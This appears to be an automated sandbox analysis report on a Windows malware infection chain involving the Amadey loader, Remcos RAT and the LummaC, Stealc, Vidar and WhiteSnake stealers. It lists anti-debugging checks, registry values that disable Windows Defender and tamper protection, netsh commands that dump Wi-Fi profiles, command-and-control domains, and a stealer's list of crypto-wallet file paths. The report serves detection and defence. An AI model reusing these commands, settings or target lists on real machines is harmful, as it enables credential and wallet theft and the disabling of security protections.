Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process queried: DebugPort
Source: C:\ProgramData\Remcos\remcos.exe	Process queried: DebugPort
Source: C:\ProgramData\Remcos\remcos.exe	Process queried: DebugPort
Source: C:\ProgramData\Remcos\remcos.exe	Process queried: DebugPort

Source: C:\Users\user\DocumentsFHIEBKKFHI.exe

Code function: 9_2_049B0C8A rdtsc

9_2_049B0C8A

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C71AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6C71AC62

Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Code function: 9_2_008E652B mov eax, dword ptr fs:[00000030h]	9_2_008E652B
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Code function: 9_2_008EA302 mov eax, dword ptr fs:[00000030h]	9_2_008EA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00B5A302 mov eax, dword ptr fs:[00000030h]	10_2_00B5A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00B5652B mov eax, dword ptr fs:[00000030h]	10_2_00B5652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B5A302 mov eax, dword ptr fs:[00000030h]	11_2_00B5A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B5652B mov eax, dword ptr fs:[00000030h]	11_2_00B5652B

Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C71AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6C71AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 6816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ed55d3f620.exe PID: 1780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: c2a8de8bf3.exe PID: 3904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ed55d3f620.exe PID: 5744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: c2a8de8bf3.exe PID: 6228, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: buildd[1].exe.11.dr, l_.cs	Reference to suspicious API methods: NativeMethods.OpenProcess(processAccessMask, bInheritHandle: false, process.Id)
Source: buildd[1].exe.11.dr, sNgu.cs	Reference to suspicious API methods: GetProcAddress(tpov7V, b5u)
Source: buildd[1].exe.11.dr, w70oes.cs	Reference to suspicious API methods: ReadProcessMemory(intPtr, lpBuffer.BaseAddress, array, array.Length, out var lpNumberOfBytesRead)

LummaC encrypted strings found

Source: ed55d3f620.exe, 0000001A.00000002.2848756291.0000000000B61000.00000040.00000001.01000000.00000015.sdmp	String found in binary or memory: scriptyprefej.store
Source: ed55d3f620.exe, 0000001A.00000002.2848756291.0000000000B61000.00000040.00000001.01000000.00000015.sdmp	String found in binary or memory: navygenerayk.store
Source: ed55d3f620.exe, 0000001A.00000002.2848756291.0000000000B61000.00000040.00000001.01000000.00000015.sdmp	String found in binary or memory: founpiuer.store
Source: ed55d3f620.exe, 0000001A.00000002.2848756291.0000000000B61000.00000040.00000001.01000000.00000015.sdmp	String found in binary or memory: necklacedmny.store
Source: ed55d3f620.exe, 0000001A.00000002.2848756291.0000000000B61000.00000040.00000001.01000000.00000015.sdmp	String found in binary or memory: thumbystriw.store
Source: ed55d3f620.exe, 0000001A.00000002.2848756291.0000000000B61000.00000040.00000001.01000000.00000015.sdmp	String found in binary or memory: fadehairucw.store
Source: ed55d3f620.exe, 0000001A.00000002.2848756291.0000000000B61000.00000040.00000001.01000000.00000015.sdmp	String found in binary or memory: crisiwarny.store
Source: ed55d3f620.exe, 0000001A.00000002.2848756291.0000000000B61000.00000040.00000001.01000000.00000015.sdmp	String found in binary or memory: presticitpo.store

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsFHIEBKKFHI.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsFHIEBKKFHI.exe "C:\Users\user\DocumentsFHIEBKKFHI.exe"	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe "C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe "C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe "C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe "C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe "C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C764760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6C764760

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C641C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

0_2_6C641C30

Source: 315ef68721.exe, 0000001F.00000002.2823295162.0000000001136000.00000040.00000001.01000000.00000017.sdmp	Binary or memory string: "v.Program Manager
Source: skotes.exe, skotes.exe, 0000000B.00000002.2925332684.0000000000D4F000.00000040.00000001.01000000.0000000F.sdmp, remcos.exe, 0000000D.00000002.2926361931.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: file.exe, file.exe, 00000000.00000002.1988707190.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp, ed55d3f620.exe, 0000001A.00000002.2855925384.0000000006110000.00000040.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000002.2908441599.0000000006360000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: YProgram Manager
Source: remcos_a.exe, 0000000C.00000002.2460451100.0000000000607000.00000040.00000001.01000000.00000010.sdmp, remcos.exe, 0000000D.00000002.2923240993.0000000000607000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: $Program Manager
Source: remcos.exe, 0000000D.00000002.2926361931.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Program Manager]

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C71AE71 cpuid

0_2_6C71AE71

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C71A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6C71A8DC

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 11_2_00B265E0 LookupAccountNameA,

11_2_00B265E0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C668390 NSS_GetVersion,

0_2_6C668390

Source: C:\ProgramData\Remcos\remcos.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Source: ed55d3f620.exe, 0000001A.00000003.2782057155.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2726875618.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2668363358.0000000000802000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000002.2907285453.0000000005623000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 11.2.skotes.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.skotes.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.DocumentsFHIEBKKFHI.exe.8b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2046814392.00000000008B1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2089934901.0000000000B21000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2923039342.0000000000B21000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ed55d3f620.exe PID: 1780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ed55d3f620.exe PID: 5744, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Remcos RAT

Source: Yara match	File source: 00000022.00000003.2918030164.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2469760286.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2926361931.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2625408884.0000000000988000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2584176441.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2922707020.0000000000401000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2460202180.0000000000401000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2453130282.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2624639013.0000000000401000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2934103657.0000000004C2F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2419805478.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: remcos_a.exe PID: 7184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: remcos.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: remcos.exe PID: 7640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: remcos.exe PID: 180, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Remcos\logs.dat, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.ed55d3f620.exe.5ef0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.c2a8de8bf3.exe.3f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.ed55d3f620.exe.5ca0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.c2a8de8bf3.exe.3f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1988015001.0000000000771000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1669066105.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2629001763.00000000003F1000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2791492042.00000000003F1000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.2738544511.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2902465184.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2630997068.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2908134178.0000000005EF1000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2792882659.000000000126B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2855529774.0000000005CA1000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.2576226521.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1989629326.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2858928335.00000000082F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2794443992.00000000081E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2848105530.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ed55d3f620.exe PID: 1780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: c2a8de8bf3.exe PID: 3904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ed55d3f620.exe PID: 5744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: c2a8de8bf3.exe PID: 6228, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 6816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ed55d3f620.exe PID: 5744, type: MEMORYSTR

Yara detected WhiteSnake Stealer

Source: Yara match

File source: Process Memory Space: buildd.exe PID: 8080, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1988015001.0000000000884000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1988015001.0000000000884000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
